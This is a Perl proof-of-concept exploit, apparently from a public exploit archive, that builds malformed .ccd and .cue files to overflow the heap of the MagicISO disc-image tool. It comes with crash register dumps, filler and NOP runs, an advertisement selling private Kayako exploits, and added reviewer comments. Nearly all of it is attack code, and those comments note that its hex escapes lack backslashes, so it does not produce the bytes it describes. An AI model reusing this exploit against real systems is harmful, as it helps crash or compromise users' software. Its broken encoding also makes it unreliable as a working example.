
# Title : MagicISO CCD/Cue Local Heap Overflow Exploit PoC
# Published : 2009-04-16
# Author : Stack


#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit PoC
# ----------------------------------------------------------------
# Mountassif Moad 
# Stack ..
# Cyber-Zone .. 
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-' 
# Registers for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Registers for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBX partially overwritten with 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash 
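# Print the usage text and terminate.  The script accepts a single
# argument naming the output type; the dispatch below only recognises
# ".ccd" and ".cue", so the original usage line advertising ".cpp" was
# wrong and is corrected here.  exit() is unconditional: callers never
# return from help().
sub help {
    print "[!] usage :\n    perl $0 .ccd\n    perl $0 .cue\n";
    exit();
}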
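# Require the output-type argument; anything false (missing, empty, "0")
# falls through to the usage text.  Called with parentheses: the original
# `&help` form passes the caller's @_ through untouched, which is never
# what a usage helper wants.
help() unless $ARGV[0];
my $xpl = $ARGV[0];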
# CCD framing.  Read as Perl hex escapes, this literal decodes to a
# CloneCD control file: [CloneCD] Version=3, [Disc] with four TOC
# entries in one session, [Session 1], [Entry 0]..[Entry 3] and finally
# "[TRACK 1]\r\nMODE=1\r\nINDEX 1=999" -- the INDEX value is left
# unterminated so that the payload appended in the dispatch block lands
# inside it.  NOTE(review): in this copy every `x5B…` pair is missing the
# backslash a Perl hex escape needs, so as written the literal is plain
# ASCII text rather than the bytes just described.
my $header =  
            "x5Bx43x6Cx6Fx6Ex65x43x44x5Dx0Dx0Ax56x65x72x73x69".
            "x6Fx6Ex3Dx33x0Dx0Ax5Bx44x69x73x63x5Dx0Dx0Ax54x6F".
            "x63x45x6Ex74x72x69x65x73x3Dx34x0Dx0Ax53x65x73x73".
            "x69x6Fx6Ex73x3Dx31x0Dx0Ax44x61x74x61x54x72x61x63".
            "x6Bx73x53x63x72x61x6Dx62x6Cx65x64x3Dx30x0Dx0Ax43".
            "x44x54x65x78x74x4Cx65x6Ex67x74x68x3Dx30x0Dx0Ax5B".
            "x53x65x73x73x69x6Fx6Ex20x31x5Dx0Dx0Ax50x72x65x47".
            "x61x70x4Dx6Fx64x65x3Dx31x0Dx0Ax50x72x65x47x61x70".
            "x53x75x62x43x3Dx30x0Dx0Ax5Bx45x6Ex74x72x79x20x30".
            "x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6F".
            "x69x6Ex74x3Dx30x78x61x30x0Dx0Ax41x44x52x3Dx30x78".
            "x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34".
            "x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69".
            "x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72".
            "x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30".
            "x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx31".
            "x0Dx0Ax50x53x65x63x3Dx30x0Dx0Ax50x46x72x61x6Dx65".
            "x3Dx30x0Dx0Ax50x4Cx42x41x3Dx34x33x35x30x0Dx0Ax5B".
            "x45x6Ex74x72x79x20x31x5Dx0Dx0Ax53x65x73x73x69x6F".
            "x6Ex3Dx31x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x61x31x0D".
            "x0Ax41x44x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72".
            "x6Fx6Cx3Dx30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6F".
            "x3Dx30x0Dx0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63".
            "x3Dx30x0Dx0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4C".
            "x42x41x3Dx2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0D".
            "x0Ax50x4Dx69x6Ex3Dx31x0Dx0Ax50x53x65x63x3Dx30x0D".
            "x0Ax50x46x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3D".
            "x34x33x35x30x0Dx0Ax5Bx45x6Ex74x72x79x20x32x5Dx0D".
            "x0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6Fx69x6E".
            "x74x3Dx30x78x61x32x0Dx0Ax41x44x52x3Dx30x78x30x31".
            "x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34x0Dx0A".
            "x54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69x6Ex3D".
            "x30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72x61x6D".
            "x65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30x0Dx0A".
            "x5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx30x0Dx0A".
            "x50x53x65x63x3Dx32x0Dx0Ax50x46x72x61x6Dx65x3Dx33".
            "x34x0Dx0Ax50x4Cx42x41x3Dx33x34x0Dx0Ax5Bx45x6Ex74".
            "x72x79x20x33x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31".
            "x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x30x31x0Dx0Ax41x44".
            "x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3D".
            "x30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0D".
            "x0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0D".
            "x0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3D".
            "x2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4D".
            "x69x6Ex3Dx30x0Dx0Ax50x53x65x63x3Dx32x0Dx0Ax50x46".
            "x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3Dx30x0Dx0A".
            "x5Bx54x52x41x43x4Bx20x31x5Dx0Dx0Ax4Dx4Fx44x45x3D".
            "x31x0Dx0Ax49x4Ex44x45x58x20x31x3Dx39x39x39";
   
   
# Cue-sheet framing.  Read as hex escapes, $header1 is `FILE "` and
# $header2 is `.BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00`;
# the dispatch block splices the payload between them, so it sits inside
# the quoted file-name field of the FILE line (this matches the EDX ASCII
# dump in the header comment).  NOTE(review): as with $header, the `x..`
# pairs in this copy lack the backslash a hex escape needs, so the
# literals are plain text as written.
my $header1=    
            "x46x49x4cx45x20x22";
my $header2=
            "x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20".
            "x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32".
            "x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31".
            "x20x30x30x3ax30x30x3ax30x30";
   
# Prefix placed before the long filler: `999Ax`, a run of `%N` pairs and
# a hex-looking string.  The author gives no explanation beyond the
# variable name; treat it as opaque data.
my $bypass=
"x39x39x39x41x78x25x4ex25x4ex25x4ex25x4ex25x4ex25".
"x4ex25x4ex25x4ex25x4ex25x4ex25x4ex25x25x4ex25x4e".
"x25x4ex25x4ex41x63x66x63x64x32x30x38x34x39x35x64".
"x35x36x35x65x66x36x36x65x37x64x66x66x39x66x39x38".
"x37x36x34x64x61x63x34x63x61x34x32x33x38x61x30";
# Fillers named after the registers the author reports at the crash.
# The byte choices make those values recognisable in the header dump:
# EAX 44444141 is 'D'/'A', ECX 45459090 is 'E'/0x90, EDX 90904443 is
# 0x90/'D'/'C'.  Nothing here is executed; the script only writes a file.
my $edx = "x43x43x43x43";
# Intended as 4004 bytes of 'A' (0x41); $Hof below is intended as 5000
# bytes of 'F' (0x46).  Two long single-byte runs following an INDEX
# line are the cheapest signature for spotting files produced by this
# script in a CCD/CUE scanner.
my $Bof = "x41" x 4004;
my $eax = "x44x44x44x44";
my $Nop = "x90" x 4;        # four 0x90 bytes; the name suggests x86 NOP
my $ecx = "x45x45x45x45";
my $Sop = "x91" x 20;       # twenty 0x91 bytes; purpose not stated
my $Hof = "x46" x 5000;

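# Write $payload to $path in the current directory, failing loudly on any
# I/O error.  The original used a bareword handle with an unchecked
# two-arg open, so a failed write still reported "Done".
sub _write_payload {
    my ($path, $payload) = @_;
    open my $out, '>', $path or die "open $path: $!";
    print {$out} $payload or die "write $path: $!";
    close $out or die "close $path: $!";
    print "[!] Done\n";
    return;
}

# Dispatch on the requested output type.  Both variants carry the same
# filler sequence; the cue variant wraps it in the FILE "..." line and the
# TRACK/INDEX trailer held in $header1/$header2.  Any other argument
# prints usage and exits.
if ($xpl eq '.ccd') {
    _write_payload('Exploit.ccd',
        $header . $bypass . $edx . $Bof . $eax . $Nop . $ecx . $Sop . $Hof);
}
elsif ($xpl eq '.cue') {
    _write_payload('Exploit.cue',
        $header1 . $bypass . $edx . $Bof . $eax . $Nop . $ecx . $Sop . $Hof . $header2);
}
else {
    help();
}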
